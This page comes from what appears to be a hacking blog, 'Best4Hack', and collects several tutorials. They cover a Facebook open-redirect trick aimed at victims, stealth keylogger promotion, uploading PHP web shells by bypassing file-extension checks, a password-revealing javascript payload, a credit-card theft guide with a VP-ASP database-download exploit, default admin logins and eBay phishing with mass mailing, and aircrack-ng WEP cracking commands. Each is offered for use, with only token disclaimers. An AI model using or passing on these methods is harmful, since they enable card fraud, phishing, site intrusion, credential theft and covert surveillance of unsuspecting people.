Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Showing posts with label Hacking Tricks. Show all posts
Showing posts with label Hacking Tricks. Show all posts

Saturday, 8 March 2014

Facebook Open Redirect Variability


Facebook Open Redirect Variability

This very short tutorial will explain my way of creating Facebook open redirect links. s some of you may know, Facebook open redirects are rare and hard to make due to the LinkShin (l.php)
This method however, is easy and Facebook the selves don't think this is a vulnerability: "This is not a vulnerability in our opinion." Note the "in our opinion" - to me this is a vulnerability.
This open redirect will work as long as your are friends with the person you are sending the link to.

Step 1 :-

First Visit to this link over to http://facebook.com/help/cookies

The page will look like :-


Facebook Open Redirect Variability

Step 2 :-

Then view the page source and search for h=

Facebook Open Redirect Variability
.
Step 3 :-

copy the security code after the h= and before the &s=. It will look like this h=XXXXXXXXX You have to copy only XXXXXXXXX

Step 4 :-

Now simply create the URL like http://facebook.com/l.php?u=http://best4hack.com/&h=XXXXXXXXX

Step 5 :-

Give this link to your victim he or she will get the redirect to be open (without "leaving facebook" warning)

As said earlier you can only get the redirect to be open (without "leaving facebook" warning) if you're sending this link to a friend.
It is possible to create the link before adding the victim as a friend. But there does have to be that "relationship" between accounts.

Saturday, 22 February 2014

HOW TO USE PHONE AS CCTV CAMERA

Sunday, 26 May 2013

What Is Keylogging Software






If you've been looking into keylogging software, you may want to know exactly what it is and what it can be used for. The term keylogger is now regarded as outdated, as it only refers to one function the software can perform: logging anything typed. But as tech has improved so has the need to monitor and log all sides of computing; and so keyloggers have taken the more ubiquitous name of 'Computer Monitoring Software'.

Computer Monitoring Software can be used in a variety of situations. From monitoring which websites are being visited, to finding out someone's password. Parents use monitoring software to keep on eye on their kids and employees use it to keep checks on those employees who they suspect of slacking off too much. Monitoring software can also be used as a highly effective instantaneous back up tool, because everything that is done on the computer is instantly logged, where as most back up tools will only do this at set intervals. Whatever your reason for needing keylogging software you'll be sure to find something that suits your needs.

So what exactly can monitoring software monitor? These days pretty much anything. They will monitor every website visited, every application used, every document or file opened (or moved, deleted, saved etc), everything printed and everything typed (including the website or application it was typed into). All of this will be logged in an easy to read way, and marked with the times and dates of each activity. Some keyloggers will also include extra features like microphone recording or webcam monitoring. But these features will usually cost more.

The other big function of computer monitoring software is that it works in absolute stealth. Once it is downloaded and installed, it will run quietly every time the computer is started up, all will log everything whilst being hidden in the background. Users of the computer will not know they are being monitored, even if they look for a program in the start menu, task manager, program files directory, or anywhere else you'd look for installed software. Keyloggers can stay completely hidden. You will also be able to set the software to send you the logs secretly via email, so that you don't have to risk logging back into the computer (using a key combination and password to access the software) and getting caught out.

As you can see, keylogging software is pretty powerful these days and can be used for a wide range of reasons. If you'd like to see some reviews of top keylogger software head to the keylogger downloads and reviews site here, where Gecko Monitor is currently number one.

Tuesday, 30 April 2013

How Create Virtual Online Drive For Free With The Help Of Gmail



You all may know well about virtual drives. But what about creating an online virtual drive in your own computer and make it available to you anytime anywhere. Surprised ah ? Yes its true, about creating virtual disk. Gmail is providing about 7650MB to 10240MB for each account, That means you can create a virtual online disk of about 7.5 GB to 10 GB in your own computer.All this is possible with the help of a tool called Gmail Drive.GMail Drive creates a virtual filesystem around your Google Mail account, allowing you to use Gmail as a storage medium.

GMail Drive creates a virtual filesystem on top of your Google Gmail account and enables you to save and retrieve files stored on your Gmail account directly from inside Windows Explorer. GMail Drive literally adds a new drive to your computer under the My Computer folder, where you can create new folders, copy and drag'n'drop files to it.Ever since Google started to offer users a Gmail e-mail account, which includes storage space of 7650megabytes to 10240megabytes , you have had plenty of storage space but not a lot to fill it up with. With GMail Drive you can easily copy files to your Google Mail Account and retrieve them again.

When you create a new file using GMail Drive, it generates an e-mail and posts it to your account. The e-mail appears in your normal Inbox folder, and the file is attached as an e-mail attachment. GMail Drive periodically checks your mail account (using the Gmail search function) to see if new files have arrived and to rebuild the directory structures. But basically GMail Drive acts as any other hard-drive installed on your computer.

HOW TO MAKE A VIRTUAL ONLINE DRIVE:-

GMail Drive creates a virtual filesystem on top of your Google Gmail account and enables you to save and retrieve files stored on your Gmail account directly from inside Windows Explorer.

First Download GmailDrive Clickl Here To DOWNLOAD

STEPS To Follow:-

1. Extract all the files from the downloaded archive and run setup.After installation go to My Computer where you see a drive like given below.



GMail Drive literally adds a new drive to your computer under the My Computer folder, where you can create new folders, copy and drag'n'drop files to it.

2. Double click on the Drive,when you do it then you see a window pop up like below picture...



Enter your gmail ID and Password.Its better dont use your personal Email.Create a new one for this virual online drive and thats it, All the data in this drive is secure and can be accessed only by from anywhere and at anytime.

HOW TO REMOVE THIS VIRTUAL DRIVE:-

If you want to remove this virtual drive from your system just goto
control panel => programs and features=>uninstall or change program 
and uninstall GmailDrive from there.It will be automatically removed from My Computer

Thursday, 25 April 2013

How To Rename "Refresh" Option In Windows XP




Hey guys welcome to Best4Hack today I am going to tell you How To Rename "Refresh" Option In Windows XP you have to follow just some simple steps and your work will be done.

What is Resource Hacker :-

1. View resources in Win32 executable files (*.exe, *.dll, *.cpl, *.ocx) and in Win32 resource files (*.res) in both their compiled and decompiled formats.
2. Extract (save) resources to file in: *.res format; as a binary; or as decompiled resource scripts or images. Icons, bitmaps, cursors, menus, dialogs, string tables, message tables, accelerators, Borland forms and version info resources can be fully decompiled into their respective formats, whether as image files or *.rc text
files.
3. Modify (rename or replace) resources in executable. Image resources (icons, cursors and bitmaps) can be replaced with an image from a corresponding image file (*.ico, *.cur, *.bmp), a *.res file or even another *.exe file. Dialogs, menus, stringtables, accelerators and messagetable resource scripts (and also Borland forms) can be edited and recompiled using the internal resource script editor.Resources can also be replaced with resources from a *.res file as long as the replacement resource is of the same type and has the same name.
4. Add new resources to executable.Enable a program to support multiple languages, or add a custom icon or bitmap (company logo etc) to a program's dialog.
5. Delete resources.
Most compilers add resources into applications which are never used by the application. Removing these unused resources can reduce an application's size.

Hope you all got enough information about Resource hacker,  Now can continue with our trick.

Step 1 :- Download Resource Hacker and Replacer tool for free Click here to download
Step 2 :- Open Resource Hacker and click open.
Step 3 :- Choose Shell32.dll>Menu>215>1033
Step 4 :- change the word ‘Refresh' to ‘Any name that you want'
Step 5 :- After Changing the appropriate options,Compile the script by Compile script option.
Step 6 :- Save as the file at another location.Please ensure that it must not be the original location of Shell32.dll 
Step 7 :- Now open Replacer tool
Step 8 :- Drag & Drop Shell32.dll file from system32 in Replacer than press Enter Key.
Step 9 :- Now Drag & Drop new Save as file on Replacer. Than press enter
Step 10 :- Press y and reboot the System

Thats it your are done, Now after rebooting your system, when you right click from your desktop you can see that the Refresh option name has been changed.

Friday, 8 March 2013

How to upload PHP shell through Firefox Add-on

Many times you get login of a website, but you are unable to upload your PHP shell !
Today i'll show you how to upload your PHP shell through Tamper Data an Firefox Add-on

Install Tamper Data firefox add-on:
Download Tamper Data CLICK HERE
Now Install it and Restart Firefox

Rename shell:
Note: You have to rename you .php shell to .jpg to bypass the website's security
To upload a shell, of-course you needed a upload option in login page or anywhere !

Demo:
As an example i'll take - http://freead1.net/post-free-ad-to-USA-42

It is a free classified ads posting website, so i got a upload option there !
Find your upload option click on browse, locate you .jpg shell and select it !



Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !


Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

Now click on upload button !

After clicking on upload button "Tamper with request?" window will appear !
Click on "Tamper" button


After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad


After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.

Now copy Notepad's text back to "POST_DATA" field..and click OK
It will Upload the shell as .php and you can execute it easily !
Find your .php shell & do whatever you wanted with that website
that's all !

Saturday, 16 February 2013

How to upload Shell by Live HTTP Headers

Today I will tell you how to upload shell through Live HTTP Headers.

Requirements:-

  • Mozilla Firox
  • Live HTTP Headers Add On for Firefox 
  • A shell
So now lets begin,

  1. Login to that site as a admin, then find a place to upload a file in that particular site.
  2. Then rename your shell name to shell.php.jpg (or what ever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.)
  3. Then start your Live HTTP Headers addon, after that upload your shell.
  4. Then your Live HTTP Headers will look something similar to this

  5. Then click on the shell.php.jpg, after click on Reply button.
  6. Then again a new window will open, in that window there will be two boxes, but we have to work on second box :D.
  7. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button.

Now you have successfully done, only thing you have to do is to find the shell path.

This is only for Educational purpose. Ill not responsible for any Illegal work done by you.

Thursday, 13 December 2012

See The Passwords Behind Asterisk !







Hello all users,


Prince here...I am going to show you in a short tutorial how to read out a password of a web browser.


Example:


http://www.gmail.com


Username: example@gmail.com
Password: *****


What's my password?


Alright, now you could read out the *** stuff with a simple javascript code.

(mediafire link)

All you need is to copy & paste it in the URL-address bar.

Enjoy.......


Saturday, 24 November 2012

HOW TO HACK A CREDIT CARD !!!!!!!




HELLO WORLD IM DAVIDREX IS HERE FOR A NICE AND USEFUL TRICKS:
LETS START.......


THIS TUTORIAL IS DIVIDED IN TWO PARTS.
INTRODUCTION INTO CREDIT CARDS
CREDIT CARD HACKING

NOTE: HACKING CREDIT CARDS IS AN ILLEGAL ACT, THIS IS ONLY INFORMATIONAL POST AND WE NOT RESPONSIBLE FOR ANY ACTIONS DONE BY YOU AFTER READING THIS TUTORIAL. THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

LETS START WITH SOME EASY TERMS.

WHAT IS CREDIT CARD ?

CREDIT CARDS ARE OF TWO TYPES:
DEBIT CARD
CREDIT CARD
1. DEBIT MEANS U HAVE A SUM OF AMOUNT IN IT AND U CAN USE THEM.
2. CREDIT MEANS U HAVE A CREDIT LINE LIMIT LIKE OF $10000 AND U CAN USE THEM AND BY THE END OF MONTH PAY IT TO BANK.

TO USE A CREDIT CARD ON INTERNET U JUST NOT NEED CC NUMBER AND EXPIRY BUT U NEED MANY INFO LIKE :
FIRST NAME
LAST NAME
ADDRESS
CITY
STATE
ZIP
COUNTRY
PHONE
CC NUMBER
EXPIRY
CVV2 ( THIS IS 3DIGIT SECURITY CODE ON BACKSIDE AFTER SIGNATURE PANEL )
IF YOU GET THAT INFO YOU CAN USE THAT TO BUY ANY THING ON INTERNET, LIKE SOFTWARE LICENSE, PORN SITE MEMBERSHIP, PROXY MEMBERSHIP, OR ANY THING (ONLINE SERVICES USUALLY, LIKE WEBHOSTING, DOMAINS).

IF U WANT TO MAKE MONEY $ THROUGH HACKING THEN YOU NEED TO BE VERY LUCKY... YOU NEED TO HAVE A EXACT BANK AND BIN TO CASH THAT CREDIT CARD THROUGH ATM MACHINES.

LET ME EXPLAIN HOW ?

FIRST STUDY SOME SIMPLE TERMS.

BINS = FIRST 6 DIGIT OF EVERY CREDIT CARD IS CALLED " BIN " (FOR EXAMPLE CC NUMBER IS : 4121638430101157 THEN ITS BIN IS " 412163 "), I HOPE THIS IS EASY TO UNDERSTAND.

NOW THE QUESTION IS HOW TO MAKE MONEY THROUGH CREDIT CARDS. ITS STRANGE..., WELL YOU CANT DO THAT, BUT THERE IS SPECIFIC PERSONS IN WORLD WHO CAN DO THAT. THEY CALL THEM SELVES " CASHIERS ". YOU CAN TAKE SOME TIME TO FIND A RELIABLE CASHIERS.

NOW THE QUESTION IS EVERY BANK CREDIT CARDS ARE CASHABLE AND EVERY BIN IS CASHABLE? LIKE CITIBANK, BANK OF AMERICA , MBNA .. ARE ALL BANKS ARE CASHABLES ? WELL ANSWER IS " NO ". IF U KNOW SOME THING, A LITTLE THING ABOUT BANKING SYSTEM, HAVE U EVER HEARD WHAT IS ATM MACHINES? WHERE U WITHDRAW UR CASH BY PUTTING UR CARD IN.
EVERY BANK DON'T HAVE ATM, EVERY BANK DON'T SUPPORT ATM MACHINES CASHOUT. ONLY FEW BANKS SUPPORT WITH THEIR FEW BINS (AS U KNOW BIN IS FIRST 6 DIGIT OF ANY CREDIT / DEBIT CARD NUMBER), FOR SUPPOSE BANK OF AMERICA. THAT BANK NOT HAVE ONLY 1 BIN, THAT BANK IS ASSIGNED LIKE, 412345 412370 ARE UR BINS U CAN MAKE CREDIT CARDS ON THEM. SO BANK DIVIDE THE COUNTRY CITI LOCATION WISE, LIKE FROM 412345 - 412360 IS FOR AMERICANS, AFTER THAT FOR OUTSIDERS AND LIKE THIS. I HOPE U UNDERSTAND. SO ALL BINS OF THE SAME BANK ARE EVEN NOT CASHABLE, LIKE FOR SUPPOSE THEY SUPPORT ATM IN NEW YORK AND NOT IN CALIFORNIA, SO LIKE THE BINS OF CALIFORNIA OF SAME BANK WILL BE UNCASHABLE. SO ALWAYS MAKE SURE THAT THE BINS AND BANKS ARE 100% CASHABLE IN MARKET BY MANY CASHIERS.

BE SURE CASHIERS ARE LEGIT, BECAUSE MANY CASHIERS R THERE WHICH TAKE YOUR CREDIT CARD AND RIP U OFF AND DON'T SEND YOUR 50% SHARE BACK.
YOU CAN ALSO FIND SOME CASHIERS ON MIRC *( /SERVER IRC.UNIXIRC.NET:6667 ) CHANNEL : #CASHOUT, #CCPOWER

WELL, CHECK THE WEBSITE WHERE U HAVE LIST OF BINS AND BANKS MOSTLY 101% CASHABLE. IF U GET THE CREDIT CARD OF THE SAME BANK WITH SAME BIN, THEN U CAN CASHOUT OTHERWISE NOT . REMEMBER FOR USING CREDIT CARD ON INTERNET U DON'T NEED PIN ( 4 WORDS PASSWORD WHICH U ENTER IN ATM MACHINE ), BUT FOR CASHOUT U NEED. YOU CAN GET PINS ONLY BY 2ND METHOD OF HACKING WHICH I STILL NOT POST BUT I WILL. FIRST METHOD OF SQL INJECTION AND SHOPADMIN HACKING DON'T PROVIDE WITH PINS, IT ONLY GIVE CC NUMB CVV2 AND OTHER INFO WHICH USUALLY NEED FOR SHOPPING NOT FOR CASHING.

CREDIT CARD HACKING

CC (CREDIT CARDS) CAN BE HACKED BY TWO WAYS:
CREDIT CARD SCAMS ( USUALLY USED FOR EARNING MONEY , SOME TIMES FOR SHOPPING )
CREDIT CARD SHOPADMIN HACKING ( JUST FOR FUN, KNOWLEDGE, SHOPPING ON INTERNET )
1. SHOPADMIN HACKING

THIS METHOD IS USED FOR TESTING THE KNOWLEDGE OR FOR GETTING THE CREDIT CARD FOR SHOPPING ON INTERNET, OR FOR FUN, OR ANY WAY BUT NOT FOR CASHING ( BECAUSE THIS METHOD DON'T GIVE PIN - 4 DIGIT PASSCODE ) ONLY GIVES CC NUMB , CVV2 AND OTHER BASIC INFO.

SHOPADMINS ARE OF DIFFERENT COMPANIES, LIKE: VP-ASP , X CART, ETC. THIS TUTORIAL IS FOR HACKING VP-ASP SHOP.

I HOPE U SEEN WHENEVER U TRY TO BUY SOME THING ON INTERNET WITH CC, THEY SHOW U A WELL PROGRAMMED FORM, VERY SECURE. THEY ARE CARTS, LIKE VP-ASP XCARTS. SPECIFIC SITES ARE NOT HACKED, BUT CARTS ARE HACKED.

BELOW I'M POSTING TUTORIAL TO HACK VP ASP CART. NOW EVERY SITE WHICH USE THAT CART CAN BE HACKED, AND THROUGH THEIR *MDB FILE U CAN GET THEIR CLIENTS 'CREDIT CARD DETAILS', AND ALSO LOGIN NAME AND PASSWORD OF THEIR ADMIN AREA, AND ALL OTHER INFO OF CLIENTS AND COMAPNY SECRETS.

LETS START:

TYPE: VP-ASP SHOPPING CART
VERSION: 5.00

HOW TO FIND VP-ASP 5.00 SITES?

FINDING VP-ASP 5.00 SITES IS SO SIMPLE...

1. GO TO GOOGLE.COM AND TYPE: VP-ASP SHOPPING CART 5.00
2. YOU WILL FIND MANY WEBSITES WITH VP-ASP 5.00 CART SOFTWARE INSTALLED

NOW LET'S GO TO THE EXPLOIT..

THE PAGE WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPDISPLAYCATEGORIES.ASP
THE EXPLOIT IS: DIAG_DBTEST.ASP
NOW YOU NEED TO DO THIS: ****://***.VICTIM.COM/SHOP/DIAG_DBTEST.ASP

A PAGE WILL APPEAR CONTAIN THOSE:
XDATABASE
SHOPPING140
XDBLOCATION
RESX
XDATABASETYPEXEMAILXEMAIL NAMEXEMAILSUBJECTXEMAILSY STEMXEMAILTYPEXORDERNUMBE R
EXAMPLE:

THE MOST IMPORTANT THING HERE IS XDATABASE
XDATABASE: SHOPPING140

OK, NOW THE URL WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPPING140.MDB

IF YOU DIDN'T DOWNLOAD THE DATABASE, TRY THIS WHILE THERE IS DBLOCATION:
XDBLOCATION
RESX
THE URL WILL BE: ****://***.VICTIM.COM/SHOP/RESX/SHOPPING140.MDB

IF U SEE THE ERROR MESSAGE YOU HAVE TO TRY THIS :
****://***.VICTIM.COM/SHOP/SHOPPING500.MDB

DOWNLOAD THE MDB FILE AND YOU SHOULD BE ABLE TO OPEN IT WITH ANY MDB FILE VIEWER, YOU SHOULD BE ABLE TO FIND ONE AT DOWNLOAD.COM, OR USE MS OFFICE ACCESS.
INSIDE YOU SHOULD BE ABLE TO FIND CREDIT CARD INFORMATION, AND YOU SHOULD EVEN BE ABLE TO FIND THE ADMIN USERNAME AND PASSWORD FOR THE WEBSITE.

THE ADMIN LOGIN PAGE IS USUALLY LOCATED HERE: ****://***.VICTIM.COM/SHOP/SHOPADMIN.ASP

IF YOU CANNOT FIND THE ADMIN USERNAME AND PASSWORD IN THE MDB FILE OR YOU CAN BUT IT IS INCORRECT, OR YOU CANNOT FIND THE MDB FILE AT ALL, THEN TRY TO FIND THE ADMIN LOGIN PAGE AND ENTER THE DEFAULT PASSWORDS WHICH ARE:
USERNAME: ADMIN
PASSWORD: ADMIN
OR
USERNAME: VPASP
PASSWORD: VPASP


2. HACKING THROUGH SCAMS

THIS METHOD IS USUALLY USED TO HACK FOR EARNING MONEY. WHAT HAPPENS IN THIS METHOD IS YOU CREATE A CLONE PAGE.

TARGET: ITS BASICALLY EBAY.COM OR PAYPAL.COM FOR GENERAL CREDIT CARDS, OR IF U WANT TO TARGET ANY SPECIFIC CASHABLE BANK LIKE REGIONBANK.COM THEN U HAVE TO CREATE A CLONE PAGE FOR THAT BANK.

WHAT IS EBAY.COM?

ITS A SHOPPING SITE WORLD WIDE WHICH IS USED BY MANY OF BILLION PEOPLE WHICH USE THEIR CREDIT CARDS ON EBAY. WHAT YOU DO MAKE A SIMILAR PAGE SAME AS EBAY AND UPLOAD IT ON SOME HOSTING WHICH DON'T HAVE ANY LAW RESTRICTIONS, TRY TO FIND HOSTING IN EUROPE THEY WILL MAKE YOUR SCAM UP FOR LONG TIME, AND EMAIL THE USERS OF EBAY.

HOW TO GET THE EMAILS OF THEIR USERS?

GO TO GOOGLE.COM AND TYPE "EMAIL HARVESTOR" OR ANY EMAIL SPIDER AND SEARCH FOR EBAY BUYERS AND EBAY SELLERS AND U WILL GET LONG LIST. THAT LIST IS NOT ACCURATE BUT OUT OF 1000 ATLEAST 1 EMAIL WOULD BE VALID. ATLEAST YOU WILL GET SOME TIME.

WELL U CREATE A CLONE PAGE OF EBAY, AND MAIL THE LIST U CREATE FROM SPIDER WITH MESSAGE, LIKE "YOUR ACCOUNT HAS BEEN HACKED" OR ANY REASON THAT LOOKS PROFESSIONAL, AND ASK THEM TO VISIT THE LINK BELOW AND ENTER YOUR INFO BILLING, AND THE SCAM PAGE HAVE PROGRAMMING WHEN THEY ENTER THEIR INFO IT COMES DIRECTLY TO YOUR EMAIL.
IN THE FORM PAGE U HAVE PIN REQUIRED SO U ALSO GET THE PIN NUMBER THROUGH WHICH U CAN CASH THROUGH ATM ..

NOW IF U RUN EBAY SCAM OR PAYPAL SCAM, ITS UP TO YOUR LUCK WHO'S YOUR VICTIM. A CLIENT OF BANK OF AMERICA OR OF CITIBANK OR OF REGION, ITS ABOUT LUCK, MAYBE U GET CASHABLE, MAY BE U DON'T ITS JUST LUCK, NOTHING ELSE.

SEARCH ON GOOGLE TO DOWNLOAD A SCAM SITE AND STUDY IT !

AFTER YOU CREATE YOUR SCAM SITE, JUST FIND SOME EMAIL HARVESTOR OR SPIDER FROM INTERNET (DOWNLOAD GOOD ONE AT BULK EMAIL SOFTWARE SUPERSTORE - EMAIL MARKETING INTERNET ADVERTISING) AND CREATE A GOOD EMAIL LIST.

AND YOU NEED TO FIND A MAILER (MASS SENDING MAILER) WHICH SEND MASS - EMAILS TO ALL EMAILS WITH THE MESSAGE OF UPDATING THEIR ACCOUNT ON UR SCAM PAGE ). IN FROM TO, USE EMAIL EBAY@REPLY3.EBAY.COM AND IN SUBJECT USE : EBAY - UPDATE YOUR EBAY ACCOUNT AND IN NAME USE EBAY

SOME INSTRUCTIONS:

1. MAKE SURE YOUR HOSTING REMAINS UP OR THE LINK IN THE EMAIL U WILL SEND, AND WHEN YOUR VICTIM EMAILS VISIT IT, IT WILL SHOW PAGE CANNOT BE DISPLAYED, AND YOUR PLAN WILL BE FAILED.
2. HARDEST POINT IS TO FIND HOSTING WHICH REMAINS UP IN SCAM. EVEN I DON'T FIND IT EASILY, ITS VERY VERY HARD PART.
3. MAYBE U HAVE CONTACTS WITH SOMEONE WHO OWN HOSTING COMPANY AND CO LOCATIONS OR DEDICATED HE CAN HIDE YOUR SCAM IN SOME OF DEDICATED WITHOUT RESTRICTIONS.
4. FINDING A GOOD EMAIL LIST (GOOD MEANS = ACTUALLY USERS)
5. YOUR MASS MAILING SOFTWARE LAND THE EMAILS IN INBOX OF USERS.

Friday, 23 November 2012

CROSS SITE SCRIPTING



Cross site scripting attacks are now mostly referred to as XSS attacks. A lot of websites have been found with XSS vulnerabilities including yahoo, YouTube and even some other popular websites. XSS attacks are implemented when a website has XSS vulnerabilities.
It took me months to decipher what this attack is really about. Even when I was reading books on it, I felt I was seeing Latin. Anyway now I’ve understood a whole lot about XSS attacks and how they work. It is very simple and interesting and I believe you won’t just get what I will give you here in handy anywhere.
What is XSS attack?
This attack is also known as code injection and from that we can infer that XSS attack is the exploitation of web servers by inserting codes into the web pages. It was formerly called CSS as an acronym for cross site scripting but I think because of the existence of CSS as cascading style sheet, it was changed to XSS where the “X” represents a cross. Most times, people use the search pane to do this. In an XSS vulnerable website, when a code like <script>alert(‘you are vulnerable to XSS’);</script> is inserted, a dialog box appears showing “you are vulnerable to XSS”. If this can be done, then you can implement all other XSS exploitations on that website.
Few years back, the prestigious yahoo website was vulnerable to this attack. Then we hackers will simply inject the java script below into the address bar:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
This was used to find password behind asterisks of anyone who has used his/her email account on that browser in that computer.
A scenario of how it works: Jeffrey uses his PC to check his yahoo account and then logs out. Simply because Jeffrey had checked the “remember me” check button on the yahoo password authentication page, it shows his email and his password in asterisks or big black dots. Once the jscript above is inserted in the address bar, Jeffrey’s password will display to me in a dialog box. This was used for a long time before yahoo fixed this error. However, you may still find a tutorial on how to hack yahoo accounts with this strategy but here I am telling you that it is stale and it can’t work anymore.
I don’t know much about how it happened with YouTube but I know I’ve heard severally about XSS vulnerabilities found in YouTube.
There is a lot more you can do with XSS which I will explain in latter posts so I will just list some other ways you can implement a cross site scripting attack.
·         It can be used to make cookie grabbers- with cross site scripting, you can pretend to be a website and steal cookies from some internet users.
·         It can be used to deface web pages
·         It can be used for phishing
To find XSS vulnerability in a website, you can use vulnerability scanners like acunetix, jsky, and there are so many others. You can even write your own program to find these vulnerabilities.


ETHICAL HACKING TRAINING WITH PHP/SQL TRAINING


Hello viewers, we bring you a very great opportunity right at your doorsteps.
For those of you interested in ethical hacking and information security, we have it at Innobuzz with detailed tutorials and customer friendly help.
For development of Android applications, we are there to help you
Our trainings include PHP/SQL trainning, online marketing, technical analysis, and advanced metasploit tutorials.
For the hacking newbies, Metasploit is the mother of all exploits. It is known as the best hacking tool and it is used by a lot of penetration testers. We won't hesitate to give you full knowledge on networking in our information security trainnings
We are your friends and we want you to join the world of developers and mind benders. Follow http://facebook.com/themindbenders on facebook.
We will include training kits for you including a different CD that includes training, ethical hacking tools, and much more.
and our training kits are highly comprehensive.
Do not miss the chance today. Click HERE and it is all yours.
For more info, contact
9999921380 For Indians
08128130440 For Nigerians
For other countries, just click the link given. Here it is again http://www.innobuzz.in/ebs/referral/5595  



Wednesday, 14 November 2012

Hack WEP in 5 mins !! ( Bactrack)





Open shell console and type in:

Airmon-ng start wlan0

it will say that monitor mode has started on mon0 or mon1 or mon whatever. then type clear to clear that data.

Airodump-ng mon0 (or whatever monitoring mode started on)

it will give you a list of wireless routers that are in range of your computer. pick the one with the most data currently going on for fastest results.

airodump-ng -w (filename u want to use) -c (channel the router is on) --bssid (the bssid) mon0

Then it will start packet inj, then you quickly open a new shell console.

aireplay-ng -1 0 -a (the bssid) mon0

new shell console

aireplay-ng -0 5 -a (the bssid) mon0

new shell console 

aireplay-ng -3 -b (the bssid) mon0

at this point your data per second should be around 100-500 per second and then just wait until the data reaches 40,000

when it does you can hold control and hit C on all the shell consoles to stop the commands.

Open a new shell console or use one already up and type in dir. this will show you the name of the file (the -w (filename)) in case you have forgotten what you named it. It will be a .cap file

Then type aircrack-ng (file name)

For example: aircrack-ng bobsrouter-01.cap

aircrack will say key found! and then you just copy the info down.

This is only for educational purpose... 
PrinceMahen

Related Posts Plugin for WordPress, Blogger...